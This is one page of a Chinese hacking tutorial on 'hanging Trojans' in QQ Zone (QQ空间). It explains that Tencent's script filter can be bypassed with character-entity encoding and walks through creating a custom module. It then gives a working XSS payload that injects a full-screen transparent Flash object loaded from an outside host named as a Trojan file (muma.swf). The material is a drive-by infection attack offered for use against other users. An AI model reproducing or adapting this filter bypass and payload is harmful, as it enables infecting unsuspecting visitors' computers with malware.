二、QQ空间玩挂马

    自从腾讯推出QQ空间(QQ-zone)后，各种跨站漏洞便不断暴出。虽然腾讯已经对QQ-zone进行了一次全面的更新，禁止了运行自定义脚本，不过通过我们的测试，发现所做的限制是很简单的，只需要转换一下字符就可以突破限制，在QQ空间上任意挂马。

    法一：挂Flash木马

    打开QQ空间后，在页面中点击“自定义”按钮，在弹出的工具条上依次单击“个性设置”→“新建模块”命令，也可在QQ空间页面中直接按下+组合键，打开自定义对话框。在弹出的网页对话框中输入任意“模块名称”，点击“提交”按钮，弹出创建成功的提示框。然后出现“添加内容”对话框，将其中的“网址”、“图片”中自带的“http://”删除，保持“链接名称”为空白。在“评论”中输入如下代码(如图5)：
以下是引用片段：

以下是代码片段： “<img src="javascri&amp;#112;t:document.getElementById('Mlogo').&#105;nnerHTML+='<div style=\'position:absolute;top:0;left:0;\'&gt;<EMBED src=\'http://www.binghewu.com.cn/muma.swf\' quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave-flash\'></div>';"> ”

上一页  [1] [2] [3] [4] 下一页